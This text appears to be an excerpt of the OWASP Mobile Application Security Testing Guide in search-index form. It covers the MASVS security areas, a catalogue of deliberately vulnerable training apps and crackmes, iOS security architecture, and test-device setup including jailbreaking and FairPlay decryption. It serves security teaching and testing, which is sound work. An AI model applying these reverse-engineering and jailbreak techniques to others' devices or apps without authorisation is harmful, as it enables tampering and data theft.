"},{"location":"MASTG/Intro/0x02c-Acknowledgements/","title":"Acknowledgments","text":""},{"location":"MASTG/Intro/0x02c-Acknowledgements/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"MAS Advocates are industry supporters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to push the project forward by providing consistent high-impact contributions and continuously spreading the word.
\ud83e\udd47 Being a \"MAS Advocate\" is the highest status that companies can achieve in the project, acknowledging that they've gone above and beyond to support the project.
MAS Advocates continuously support the project with time/dedicated resources with clear/high impact. To achieve this status, you'll need to demonstrate that you make consistent high-impact contributions to the project. For example:
The following will be considered but it's not a requirement:
If you'd like to apply please contact the project leaders by sending an email to Sven Schleier and Carlos Holguera who will validate your application and provide you with a contribution report. Please be sure to include sufficient evidence (e.g including links to PRs) showing what you've done in the 6 months period that goes inline with the three categories described above:
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. MAS Advocates do not influence the content of the MASVS or MASTG in any way.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#our-mas-advocates","title":"Our MAS Advocates","text":"NowSecure has provided consistent high-impact contributions to the project and has successfully helped spread the word.
We'd like to thank NowSecure for its exemplary contribution which sets a blueprint for other potential contributors wanting to push the project forward.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#nowsecures-contributions-to-the-mas-project","title":"NowSecure's Contributions to the MAS Project","text":"High-impact Contributions (time/dedicated resources):
A special mention goes for the contribution to the MASVS Refactoring:
In the past, NowSecure has also contributed to the project, has sponsored it becoming a \"God Mode Sponsor\" and has donated the UnCrackable App for Android Level 4: Radare2 Pay.
Additionally:
Showing Adoption:
Spreading the Word:
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on our OWASP Project page.
"},{"location":"MASTG/Intro/0x03-Overview/","title":"Introduction to the OWASP Mobile Application Security Project","text":"New technology always introduces new security risks, and security concerns for mobile apps differ from traditional desktop software in important ways. While modern mobile operating systems tend to be more secure than traditional desktop operating systems, problems can still appear if developers don't carefully consider security during mobile app development. These security risks often go beyond the usual concerns with data storage, inter-app communication, proper usage of cryptographic APIs, and secure network communication.
"},{"location":"MASTG/Intro/0x03-Overview/#how-to-use-the-mobile-application-security-project","title":"How to Use the Mobile Application Security Project","text":"First, the Project recommends that your mobile app security strategies should be based on the OWASP Mobile Application Security Verification Standard (MASVS), which defines a mobile app security model and lists generic security requirements for mobile apps. MASVS is designed to be used by architects, developers, testers, security professionals, and consumers to define and understand the qualities of a secure mobile app. After you have determined how OWASP MASVS applies to your mobile app's security model, the Project suggests that you use the OWASP Mobile Application Security Testing Guide (MASTG). The Testing Guide maps to the same basic set of security requirements offered by the MASVS and depending on the context, they can be used individually or combined to achieve different objectives.
For example, the MASVS requirements can be used in an app's planning and architecture design stages while the checklist and testing guide may serve as a baseline for manual security testing or as a template for automated security tests during or after development. In the \"Mobile App Security Testing\" chapter we'll describe how you can apply the checklist and MASTG to a mobile app penetration test.
"},{"location":"MASTG/Intro/0x03-Overview/#whats-covered-in-the-mobile-testing-guide","title":"What's Covered in the Mobile Testing Guide","text":"Throughout this guide, we will focus on apps for Android and iOS running on smartphones. These platforms are currently dominating the market and also run on other device classes including tablets, smartwatches, smart TVs, automotive infotainment units, and other embedded systems. Even if these additional device classes are out of scope, you can still apply most of the knowledge and testing techniques described in this guide with some deviance depending on the target device.
Given the vast amount of mobile app frameworks available it would be impossible to cover all of them exhaustively. Therefore, we focus on native apps on each operating system. However, the same techniques are also useful when dealing with web or hybrid apps (ultimately, no matter the framework, every app is based on native components).
"},{"location":"MASTG/Intro/0x03-Overview/#navigating-the-owasp-mastg","title":"Navigating the OWASP MASTG","text":"The MASTG contains descriptions of all requirements specified in the MASVS. The MASTG contains the following main sections:
The General Testing Guide contains a mobile app security testing methodology and general vulnerability analysis techniques as they apply to mobile app security. It also contains additional technical test cases that are OS-independent, such as authentication and session management, network communications, and cryptography.
The Android Testing Guide covers mobile security testing for the Android platform, including security basics, security test cases, reverse engineering techniques and prevention, and tampering techniques and prevention.
The iOS Testing Guide covers mobile security testing for the iOS platform, including an overview of the iOS OS, security testing, reverse engineering techniques and prevention, and tampering techniques and prevention.
Many mobile app penetration testers have a background in network and web app penetration testing, a quality that is valuable for mobile app testing. Almost every mobile app talks to a backend service, and those services are prone to the same types of attacks we are familiar with in web apps on desktop machines. Mobile apps have a smaller attack surface and therefore have more security against injection and similar attacks. Instead, the MASTG prioritizes data protection on the device and the network to increase mobile security.
"},{"location":"MASTG/Intro/0x03-Overview/#owasp-masvs-overview-key-areas-in-mobile-application-security","title":"OWASP MASVS Overview: Key Areas in Mobile Application Security","text":"This overview discusses how the MASVS defines and describes the key areas of mobile security:
The Standard is based on the principle that protecting sensitive data, such as user credentials and private information, is crucial to mobile security. If an app does not use operating system APIs properly, especially those that handle local storage or inter-process communication (IPC), the app could expose sensitive data to other apps running on the same device or may unintentionally leak data to cloud storage, backups, or the keyboard cache. And since mobile devices are more likely to be lost or stolen, attackers can actually gain physical access to the device, which would make it easier to retrieve the data.
Thus we must take extra care to protect stored user data in mobile apps. Some solutions may include appropriate key storage APIs and using hardware-backed security features (when available).
Fragmentation is a problem we deal with especially on Android devices. Not every Android device offers hardware-backed secure storage, and many devices are running outdated versions of Android. For an app to be supported on these out-of-date devices, it would have to be created using an older version of Android's API which may lack important security features. For maximum security, the best choice is to create apps with the current API version even though that excludes some users.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-crypto-cryptography","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is an essential ingredient when it comes to protecting data stored on a mobile device. It is also an area where things can go horribly wrong, especially when standard conventions are not followed. It is essential to ensure that the application uses cryptography according to industry best practices, including the use of proven cryptographic libraries, a proper choice and configuration of cryptographic primitives as well as a suitable random number generator wherever randomness is required.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-auth-authentication-and-authorization","title":"MASVS-AUTH: Authentication and Authorization","text":"In most cases, sending users to log in to a remote service is an integral part of the overall mobile app architecture. Even though most of the authentication and authorization logic happens at the endpoint, there are also some implementation challenges on the mobile app side. Unlike web apps, mobile apps often store long-time session tokens that are unlocked with user-to-device authentication features such as fingerprint scanning. While this allows for a quicker login and better user experience (nobody likes to enter complex passwords), it also introduces additional complexity and room for error.
Mobile app architectures also increasingly incorporate authorization frameworks (such as OAuth2) that delegate authentication to a separate service or outsource the authentication process to an authentication provider. Using OAuth2 allows the client-side authentication logic to be outsourced to other apps on the same device (e.g. the system browser). Security testers must know the advantages and disadvantages of different possible authorization frameworks and architectures.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-network-network-communication","title":"MASVS-NETWORK: Network Communication","text":"Mobile devices regularly connect to a variety of networks, including public Wi-Fi networks shared with other (potentially malicious) clients. This creates opportunities for a wide variety of network-based attacks ranging from simple to complicated and old to new. It's crucial to maintain the confidentiality and integrity of information exchanged between the mobile app and remote service endpoints. As a basic requirement, mobile apps must set up a secure, encrypted channel for network communication using the TLS protocol with appropriate settings.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-platform-interaction-with-the-mobile-platform","title":"MASVS-PLATFORM: Interaction with the Mobile Platform","text":"Mobile operating system architectures differ from classical desktop architectures in important ways. For example, all mobile operating systems implement app permission systems that regulate access to specific APIs. They also offer more (Android) or less rich (iOS) inter-process communication (IPC) facilities that enable apps to exchange signals and data. These platform-specific features come with their own set of pitfalls. For example, if IPC APIs are misused, sensitive data or functionality might be unintentionally exposed to other apps running on the device.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-code-code-quality-and-exploit-mitigation","title":"MASVS-CODE: Code Quality and Exploit Mitigation","text":"Traditional injection and memory management issues aren't often seen in mobile apps due to the smaller attack surface. Mobile apps mostly interact with the trusted backend service and the UI, so even if many buffer overflow vulnerabilities exist in the app, those vulnerabilities usually don't open up any useful attack vectors. The same applies to browser exploits such as cross-site scripting (XSS allows attackers to inject scripts into web pages) that are very prevalent in web apps. However, there are always exceptions. XSS is theoretically possible on mobile in some cases, but it's very rare to see XSS issues that an individual can exploit.
This protection from injection and memory management issues doesn't mean that app developers can get away with writing sloppy code. Following security best practices results in hardened (secure) release builds that are resilient against tampering. Free security features offered by compilers and mobile SDKs help increase security and mitigate attacks.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-resilience-anti-tampering-and-anti-reversing","title":"MASVS-RESILIENCE: Anti-Tampering and Anti-Reversing","text":"There are three things you should never bring up in polite conversations: religion, politics, and code obfuscation. Many security experts dismiss client-side protections outright. However, software protection controls are widely used in the mobile app world, so security testers need ways to deal with these protections. We believe there's a benefit to client-side protections if they are employed with a clear purpose and realistic expectations in mind and aren't used to replace security controls.
"},{"location":"MASTG/Intro/0x09-Suggested-Reading/","title":"Suggested Reading","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#mobile-app-security","title":"Mobile App Security","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#android","title":"Android","text":"The applications listed below can be used as training materials. Note: only the MASTG apps and Crackmes are tested and maintained by the MAS project.
"},{"location":"MASTG/apps/#android-apps","title":"Android Apps","text":"ID Name Platform MASTG-APP-0002 Android License Validator android MASTG-APP-0009 DVHMA android MASTG-APP-0011 MASTG Hacking Playground (Java) android MASTG-APP-0007 DIVA Android android MASTG-APP-0008 DodoVulnerableBank android MASTG-APP-0004 Android UnCrackable L2 android MASTG-APP-0003 Android UnCrackable L1 android MASTG-APP-0013 OVAA android MASTG-APP-0010 InsecureBankv2 android MASTG-APP-0012 MASTG Hacking Playground (Kotlin) android MASTG-APP-0006 Digitalbank android MASTG-APP-0005 Android UnCrackable L3 android MASTG-APP-0001 AndroGoat android MASTG-APP-0015 Android UnCrackable L4 android MASTG-APP-0014 InsecureShop android"},{"location":"MASTG/apps/#ios-apps","title":"Ios Apps","text":"ID Name Platform MASTG-APP-0026 iOS UnCrackable L2 ios MASTG-APP-0024 DVIA-v2 ios MASTG-APP-0023 DVIA ios MASTG-APP-0025 iOS UnCrackable L1 ios"},{"location":"MASTG/apps/android/MASTG-APP-0001/","title":"AndroGoat","text":"An open source vulnerable/insecure app using Kotlin. This app has a wide range of vulnerabilities related to certificate pinning, custom URL schemes, Android Network Security Configuration, WebViews, root detection and over 20 other vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0002/","title":"Android License Validator","text":"The Android License Validator is a crackme that implements a key validation function in native code, packaged as a standalone ELF executable for Android devices. Analyzing native code is often more challenging than Java, which is why critical business logic is frequently written this way.
While this sample application may not represent a real-world scenario, it serves as a valuable learning tool to grasp the basics of symbolic execution. These insights can be applied in practical situations, especially when dealing with Android apps that include obfuscated native libraries. In fact, obfuscated code is often put into native libraries specifically to make the process of de-obfuscation more challenging.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0003/","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0004/","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"MASTG/apps/android/MASTG-APP-0005/","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"MASTG/apps/android/MASTG-APP-0006/","title":"Digitalbank","text":"A vulnerable app created in 2015, which can be used on older Android platforms.
"},{"location":"MASTG/apps/android/MASTG-APP-0007/","title":"DIVA Android","text":"An app intentionally designed to be insecure which has received updates in 2016 and contains 13 different challenges.
"},{"location":"MASTG/apps/android/MASTG-APP-0008/","title":"DodoVulnerableBank","text":"An insecure Android app from 2015.
"},{"location":"MASTG/apps/android/MASTG-APP-0009/","title":"DVHMA","text":"A hybrid mobile app (for Android) that intentionally contains vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0010/","title":"InsecureBankv2","text":"A vulnerable Android app made for security enthusiasts and developers to learn the Android insecurities by testing a vulnerable application. It has been updated in 2018 and contains a lot of vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0011/","title":"MASTG Hacking Playground (Java)","text":"A vulnerable Android app by the OWASP MAS project. See included vulnerabilities in here.
"},{"location":"MASTG/apps/android/MASTG-APP-0012/","title":"MASTG Hacking Playground (Kotlin)","text":"A vulnerable Android app by the OWASP MAS project.
"},{"location":"MASTG/apps/android/MASTG-APP-0013/","title":"OVAA","text":"An Android app that aggregates all the platform's known and popular security vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0014/","title":"InsecureShop","text":"InsecureShop is an intentionally designed Android application that showcases vulnerabilities, aiming to educate developers and security experts about common pitfalls within modern Android apps. It serves as a dynamic platform for refining Android pentesting skills.
The majority of these vulnerabilities can be exploited on non-rooted devices, posing risks from both remote users and malicious third-party applications. Notably, the app doesn't utilize any APIs. InsecureShop presents an opportunity to explore a range of vulnerabilities:
Complementing these learning experiences, InsecureShop provides documentation about the implemented vulnerabilities and their associated code. This documentation, however, refrains from offering complete solutions for each vulnerability showcased within the InsecureShop app.
"},{"location":"MASTG/apps/android/MASTG-APP-0015/","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed with its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"MASTG/apps/ios/MASTG-APP-0023/","title":"DVIA","text":"A vulnerable iOS app written in Objective-C which provides a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills.
"},{"location":"MASTG/apps/ios/MASTG-APP-0024/","title":"DVIA-v2","text":"A vulnerable iOS app, written in Swift with over 15 vulnerabilities.
"},{"location":"MASTG/apps/ios/MASTG-APP-0025/","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/ios/MASTG-APP-0026/","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
By Bernhard Mueller
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/","title":"iOS Platform Overview","text":"iOS is a mobile operating system that powers Apple mobile devices, including the iPhone, iPad, and iPod Touch. It is also the basis for Apple tvOS, which inherits many functionalities from iOS. This section introduces the iOS platform from an architecture point of view. The following five key areas are discussed:
Like the Apple desktop operating system macOS (formerly OS X), iOS is based on Darwin, an open source Unix operating system developed by Apple. Darwin's kernel is XNU (\"X is Not Unix\"), a hybrid kernel that combines components of the Mach and FreeBSD kernels.
However, iOS apps run in a more restricted environment than their desktop counterparts do. iOS apps are isolated from each other at the file system level and are significantly limited in terms of system API access.
To protect users from malicious applications, Apple restricts and controls access to the apps that are allowed to run on iOS devices. Apple's App Store is the only official application distribution platform. There developers can offer their apps and consumers can buy, download, and install apps. This distribution style differs from Android, which supports several app stores and sideloading (installing an app on your iOS device without using the official App Store). In iOS, sideloading typically refers to the app installation method via USB, although there are other enterprise iOS app distribution methods that do not use the App Store under the Apple Developer Enterprise Program.
In the past, sideloading was possible only with a jailbreak or complicated workarounds. With iOS 9 or higher, it is possible to sideload via Xcode.
iOS apps are isolated from each other via Apple's iOS sandbox (historically called Seatbelt), a mandatory access control (MAC) mechanism describing the resources an app can and can't access. Compared to Android's extensive Binder IPC facilities, iOS offers very few IPC (Inter Process Communication) options, minimizing the potential attack surface.
Uniform hardware and tight hardware/software integration create another security advantage. Every iOS device offers security features, such as secure boot, hardware-backed Keychain, and file system encryption (referred to as data protection in iOS). iOS updates are usually quickly rolled out to a large percentage of users, decreasing the need to support older, unprotected iOS versions.
In spite of the numerous strengths of iOS, iOS app developers still need to worry about security. Data protection, Keychain, Touch ID/Face ID authentication, and network security still leave a large margin for errors. In the following chapters, we describe iOS security architecture, explain a basic security testing methodology, and provide reverse engineering how-tos.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#ios-security-architecture","title":"iOS Security Architecture","text":"The iOS security architecture, officially documented by Apple in the iOS Security Guide, consists of six core features. This security guide is updated by Apple for each major iOS version:
The iOS security architecture makes good use of hardware-based security features that enhance overall performance. Each iOS device comes with two built-in Advanced Encryption Standard (AES) 256-bit keys. The device\u2019s unique IDs (UIDs) and device group IDs (GIDs) are AES 256-bit keys fused (UID) or compiled (GID) into the Application Processor (AP) and Secure Enclave Processor (SEP) during manufacturing. There's no direct way to read these keys with software or debugging interfaces such as JTAG. Encryption and decryption operations are performed by hardware AES crypto-engines that have exclusive access to these keys.
The GID is a value shared by all processors in a class of devices used to prevent tampering with firmware files and other cryptographic tasks not directly related to the user's private data. UIDs, which are unique to each device, are used to protect the key hierarchy that's used for device-level file system encryption. Because UIDs aren't recorded during manufacturing, not even Apple can restore the file encryption keys for a particular device.
To allow secure deletion of sensitive data on flash memory, iOS devices include a feature called Effaceable Storage. This feature provides direct low-level access to the storage technology, making it possible to securely erase selected blocks.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#secure-boot","title":"Secure Boot","text":"When an iOS device is powered on, it reads the initial instructions from the read-only memory known as Boot ROM, which bootstraps the system. The Boot ROM contains immutable code and the Apple Root CA, which is etched into the silicon chip during the fabrication process, thereby creating the root of trust. Next, the Boot ROM makes sure that the LLB's (Low Level Bootloader) signature is correct, and the LLB checks that the iBoot bootloader's signature is correct too. After the signature is validated, the iBoot checks the signature of the next boot stage, which is the iOS kernel. If any of these steps fail, the boot process will terminate immediately and the device will enter recovery mode and display the restore screen. However, if the Boot ROM fails to load, the device will enter a special low-level recovery mode called Device Firmware Upgrade (DFU). This is the last resort for restoring the device to its original state. In this mode, the device will show no sign of activity; i.e., its screen won't display anything.
This entire process is called the \"Secure Boot Chain\". Its purpose is focused on verifying the boot process integrity, ensuring that the system and its components are written and distributed by Apple. The Secure Boot chain consists of the kernel, the bootloader, the kernel extension, and the baseband firmware.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#code-signing","title":"Code Signing","text":"Apple has implemented an elaborate DRM system to make sure that only Apple-approved code runs on their devices, that is, code signed by Apple. In other words, you won't be able to run any code on an iOS device that hasn't been jailbroken unless Apple explicitly allows it. End users are supposed to install apps through the official Apple's App Store only. For this reason (and others), iOS has been compared to a crystal prison.
A developer profile and an Apple-signed certificate are required to deploy and run an application. Developers need to register with Apple, join the Apple Developer Program and pay a yearly subscription to get the full range of development and deployment possibilities. There's also a free developer account that allows you to compile and deploy apps (but not distribute them in the App Store) via sideloading.
According to the Archived Apple Developer Documentation the code signature consists of three parts:
Learn more:
FairPlay Code Encryption is applied to apps downloaded from the App Store. FairPlay was developed as a DRM when purchasing multimedia content. Originally, FairPlay encryption was applied to MPEG and QuickTime streams, but the same basic concepts can also be applied to executable files. The basic idea is as follows: Once you register a new Apple user account, or Apple ID, a public/private key pair will be created and assigned to your account. The private key is securely stored on your device. This means that FairPlay-encrypted code can be decrypted only on devices associated with your account. Reverse FairPlay encryption is usually obtained by running the app on the device, then dumping the decrypted code from memory (see also \"Basic Security Testing on iOS\").
Apple has built encryption into the hardware and firmware of its iOS devices since the release of the iPhone 3GS. Every device has a dedicated hardware-based cryptographic engine that provides an implementation of the AES 256-bit encryption and the SHA-1 hashing algorithms. In addition, there's a unique identifier (UID) built into each device's hardware with an AES 256-bit key fused into the Application Processor. This UID is unique and not recorded elsewhere. At the time of writing, neither software nor firmware can directly read the UID. Because the key is burned into the silicon chip, it can't be tampered with or bypassed. Only the crypto engine can access it.
Building encryption into the physical architecture makes it a default security feature that can encrypt all data stored on an iOS device. As a result, data protection is implemented at the software level and works with the hardware and firmware encryption to provide more security.
When data protection is enabled, by simply establishing a passcode in the mobile device, each data file is associated with a specific protection class. Each class supports a different level of accessibility and protects data on the basis of when the data needs to be accessed. The encryption and decryption operations associated with each class are based on multiple key mechanisms that utilize the device's UID and passcode, a class key, a file system key, and a per-file key. The per-file key is used to encrypt the file's contents. The class key is wrapped around the per-file key and stored in the file's metadata. The file system key is used to encrypt the metadata. The UID and passcode protect the class key. This operation is invisible to users. To enable data protection, the passcode must be used when accessing the device. The passcode unlocks the device. Combined with the UID, the passcode also creates iOS encryption keys that are more resistant to hacking and brute-force attacks. Enabling data protection is the main reason for users to use passcodes on their devices.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#sandbox","title":"Sandbox","text":"The app sandbox is an iOS access control technology. It is enforced at the kernel level. Its purpose is limiting system and user data damage that may occur when an app is compromised.
Sandboxing has been a core security feature since the first release of iOS. All third-party apps run under the same user (mobile
), and only a few system applications and services run as root
(or other specific system users). Regular iOS apps are confined to a container that restricts access to the app's own files and a very limited number of system APIs. Access to all resources (such as files, network sockets, IPCs, and shared memory) are controlled by the sandbox. These restrictions work as follows [#levin]:
mmap
and mprotect
system calls are modified to prevent apps from making writable memory pages executable and stopping processes from executing dynamically generated code. In combination with code signing and FairPlay, this strictly limits what code can run under specific circumstances (e.g., all code in apps distributed via the App Store is approved by Apple).iOS implements address space layout randomization (ASLR) and eXecute Never (XN) bit to mitigate code execution attacks.
ASLR randomizes the memory location of the program's executable file, data, heap, and stack every time the program is executed. Because the shared libraries must be static to be accessed by multiple processes, the addresses of shared libraries are randomized every time the OS boots instead of every time the program is invoked. This makes specific function and library memory addresses hard to predict, thereby preventing attacks such as the return-to-libc attack, which involves the memory addresses of basic libc functions.
The XN mechanism allows iOS to mark selected memory segments of a process as non-executable. On iOS, the process stack and heap of user-mode processes is marked non-executable. Pages that are writable cannot be marked executable at the same time. This prevents attackers from executing machine code injected into the stack or heap.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#software-development-on-ios","title":"Software Development on iOS","text":"Like other platforms, Apple provides a Software Development Kit (SDK) that helps developers to develop, install, run, and test native iOS Apps. Xcode is an Integrated Development Environment (IDE) for Apple software development. iOS applications are developed in Objective-C or Swift.
Objective-C is an object-oriented programming language that adds Smalltalk-style messaging to the C programming language. It is used on macOS to develop desktop applications and on iOS to develop mobile applications. Swift is the successor of Objective-C and allows interoperability with Objective-C.
Swift was introduced with Xcode 6 in 2014.
On a non-jailbroken device, there are two ways to install an application out of the App Store:
iOS apps are distributed in IPA (iOS App Store Package) archives. The IPA file is a ZIP-compressed archive that contains all the code and resources required to execute the app.
IPA files have a built-in directory structure. The example below shows this structure at a high level:
/Payload/
folder contains all the application data. We will come back to the contents of this folder in more detail./Payload/Application.app
contains the application data itself (ARM-compiled code) and associated static resources./iTunesArtwork
is a 512x512 pixel PNG image used as the application's icon./iTunesMetadata.plist
contains various bits of information, including the developer's name and ID, the bundle identifier, copyright information, genre, the name of the app, release date, purchase date, etc./WatchKitSupport/WK
is an example of an extension bundle. This specific bundle contains the extension delegate and the controllers for managing the interfaces and responding to user interactions on an Apple Watch.Let's take a closer look at the different files in the IPA container. Apple uses a relatively flat structure with few extraneous directories to save disk space and simplify file access. The top-level bundle directory contains the application's executable file and all the resources the application uses (for example, the application icon, other images, and localized content).
A language.lproj folder exists for each language that the application supports. It contains a storyboard and strings file.
On a jailbroken device, you can recover the IPA for an installed iOS app using different tools that allow decrypting the main app binary and reconstructing the IPA file. Similarly, on a jailbroken device you can install the IPA file with IPA Installer. During mobile security assessments, developers often give you the IPA directly. They can send you the actual file or provide access to the development-specific distribution platform they use, e.g. TestFlight or Visual Studio App Center.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-permissions","title":"App Permissions","text":"In contrast to Android apps (before Android 6.0 (API level 23)), iOS apps don't have pre-assigned permissions. Instead, the user is asked to grant permission during runtime, when the app attempts to use a sensitive API for the first time. Apps that have been granted permissions are listed in the Settings > Privacy menu, allowing the user to modify the app-specific setting. Apple calls this permission concept privacy controls.
iOS developers can't set requested permissions directly, these will be requested indirectly when accessing sensitive APIs. For example, when accessing a user's contacts, any call to CNContactStore blocks the app while the user is being asked to grant or deny access. Starting with iOS 10.0, apps must include usage description keys for the types of permissions they request and data they need to access (e.g., NSContactsUsageDescription).
The following APIs require user permission:
The DeviceCheck framework, including its components DeviceCheck and App Attest, helps you prevent fraudulent use of your services. It consists of a framework that you use from your app and an Apple server which is accessible only to your own server. DeviceCheck allows you to persistently store information on the device and on Apple servers. The stored information remains intact across app reinstallation, device transfers, or resets, with the option to reset this data periodically.
DeviceCheck is typically used to mitigate fraud by restricting access to sensitive resources. For example, limiting promotions to once per device, identifying and flagging fraudulent devices, etc. However, it definitely cannot prevent all fraud. For example, it is not meant to detect compromised operating systems (aka. jailbreak detection).
For more information, refer to the DeviceCheck documentation.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-attest","title":"App Attest","text":"App Attest, available under the DeviceCheck framework, helps you verify instances of the app running on a device by enabling apps to attach a hardware-backed assertion to requests, ensuring they originate from the legitimate app on a genuine Apple device. This feature aids in preventing modified apps from communicating with your server.
The process involves generating and validating cryptographic keys, along with a set of verifications performed by your server, ensuring the authenticity of the request. It is important to note that while App Attest enhances security, it does not guarantee complete protection against all forms of fraudulent activities.
For more detailed information, refer to the WWDC 2021 session, along with the App Attest documentation and App Attest implementation guide.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/","title":"iOS Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of iOS apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#ios-testing-setup","title":"iOS Testing Setup","text":"Although you can use a Linux or Windows host computer for testing, you'll find that many tasks are difficult or impossible on these platforms. In addition, the Xcode development environment and the iOS SDK are only available for macOS. This means that you'll definitely want to work on macOS for source code analysis and debugging (it also makes black box testing easier).
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#host-device","title":"Host Device","text":"The following is the most basic iOS app testing setup:
The UDID is a 40-digit unique sequence of letters and numbers to identify an iOS device. You can find the UDID of your iOS device on macOS Catalina onwards in the Finder app, as iTunes is not available anymore in Catalina. Open Finder and select the connected iOS device in the sidebar.
Click on the text containing the model, storage capacity, and battery information, and it will display the serial number, UDID, and model instead:
You can copy the UDID by right clicking on it.
It is also possible to get the UDID via various command line tools on macOS while the device is attached via USB:
By using the I/O Registry Explorer tool ioreg
:
$ ioreg -p IOUSB -l | grep \"USB Serial\"\n| \"USB Serial Number\" = \"9e8ada44246cee813e2f8c1407520bf2f84849ec\"\n
By using ideviceinstaller (also available on Linux):
$ brew install ideviceinstaller\n$ idevice_id -l\n316f01bd160932d2bf2f95f1f142bc29b1c62dbc\n
By using the system_profiler:
$ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep \"Serial Number:\"\n2019-09-08 10:18:03.920 system_profiler[13251:1050356] SPUSBDevice: IOCreatePlugInInterfaceForService failed 0xe00002be\n Serial Number: 64655621de6ef5e56a874d63f1e1bdd14f7103b1\n
By using instruments:
instruments -s devices\n
You should have a jailbroken iPhone or iPad for running tests. These devices allow root access and tool installation, making the security testing process more straightforward. If you don't have access to a jailbroken device, you can apply the workarounds described later in this chapter, but be prepared for a more difficult experience.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-the-ios-simulator","title":"Testing on the iOS Simulator","text":"Unlike the Android emulator, which fully emulates the hardware of an actual Android device, the iOS SDK simulator offers a higher-level simulation of an iOS device. Most importantly, emulator binaries are compiled to x86 code instead of ARM code. Apps compiled for a real device don't run, making the simulator useless for black box analysis and reverse engineering.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Corellium is the only publicly available iOS emulator. It is an enterprise SaaS solution with a per user license model and does not offer community licenses.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"iOS jailbreaking is often compared to Android rooting, but the process is actually quite different. To explain the difference, we'll first review the concepts of \"rooting\" and \"flashing\" on Android.
su
binary on the system or replacing the whole system with a rooted custom ROM. Exploits aren't required to obtain root access as long as the bootloader is accessible.On iOS devices, flashing a custom ROM is impossible because the iOS bootloader only allows Apple-signed images to be booted and flashed. This is why even official iOS images can't be installed if they aren't signed by Apple, and it makes iOS downgrades only possible for as long as the previous iOS version is still signed.
The purpose of jailbreaking is to disable iOS protections (Apple's code signing mechanisms in particular) so that arbitrary unsigned code can run on the device (e.g. custom code or downloaded from alternative app stores such as Cydia or Sileo). The word \"jailbreak\" is a colloquial reference to all-in-one tools that automate the disabling process.
Developing a jailbreak for a given version of iOS is not easy. As a security tester, you'll most likely want to use publicly available jailbreak tools. Still, we recommend studying the techniques that have been used to jailbreak various versions of iOS-you'll encounter many interesting exploits and learn a lot about OS internals. For example, Pangu9 for iOS 9.x exploited at least five vulnerabilities, including a use-after-free kernel bug (CVE-2015-6794) and an arbitrary file system access vulnerability in the Photos app (CVE-2015-7037).
